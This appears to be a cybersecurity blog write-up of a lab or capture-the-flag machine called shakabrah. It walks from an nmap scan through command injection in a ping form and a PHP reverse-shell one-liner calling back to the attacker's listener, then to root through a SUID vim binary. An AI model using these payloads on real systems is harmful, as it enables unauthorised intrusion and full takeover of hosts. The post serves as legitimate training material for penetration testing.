Muzec's Cyber Security Blog

Hack. Sleep. Repeat

View on GitHub

Enumeration With Nmap

We always start with an nmap scan…..

Nmap -sC -sV -oA nmap <Target-IP>

└─$ nmap -sC -sV -oA nmap
Starting Nmap 7.91 ( ) at 2021-07-23 14:02 WAT
Nmap scan report for
Host is up (0.27s latency).
Not shown: 998 filtered ports
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 33:b9:6d:35:0b:c5:c4:5a:86:e0:26:10:95:48:77:82 (RSA)
|   256 a8:0f:a7:73:83:02:c1:97:8c:25:ba:fe:a5:11:5f:74 (ECDSA)
|_  256 fc:e9:9f:fe:f9:e0:4d:2d:76:ee:ca:da:af:c3:39:9e (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 36.11 seconds

Web Enumeration On Port 80

Since HTTP is open which is port 80 let vist it on our browser we can see a page which allow us to ping a host like a localhost so i try pinging to see what we have on the web page.


PING ( 56(84) bytes of data.
64 bytes from icmp_seq=1 ttl=64 time=0.035 ms
64 bytes from icmp_seq=2 ttl=64 time=0.050 ms
64 bytes from icmp_seq=3 ttl=64 time=0.039 ms
64 bytes from icmp_seq=4 ttl=64 time=0.046 ms

--- ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3077ms
rtt min/avg/max/mdev = 0.035/0.042/0.050/0.008 ms

Exploitation Os Command Injection On The Page Form

Let try to verify this by attempting to run the id command using the following payload: | id .

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Boom we have command injection now let try to get a reverse shell back to us.

└─$ sudo nc -nvlp 80
[sudo] password for muzec: 
listening on [any] 80 ...

Now our payload.

php -r '$sock=fsockopen("",1234);exec("/bin/sh -i <&3 >&3 2>&3");'


We have shell now let spawn a TTY shell.

python3 -c 'import pty; pty.spawn ("/bin/bash")'
www-data@shakabrah:/var/www/html$ uname -a;id;whoami
uname -a;id;whoami
Linux shakabrah 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
uid=33(www-data) gid=33(www-data) groups=33(www-data)

SUID Privilege Escaltion

find / -perm -u=s -type f 2>/dev/null

SUID Binaries


We can see /usr/bin/vim.basic so that our way to root let exploit it.

/usr/bin/vim.basic -c ':py3 import os; os.execl("/bin/bash", "bash", "-pc", "reset; exec bash -p")'


We came accross some few error with vim asking for terminal type now let gp back to our main machine to check our terminal type.

echo $TERM


So it screen now let go back to the target.


We are root and done.

Greeting From Muzec

Back To Home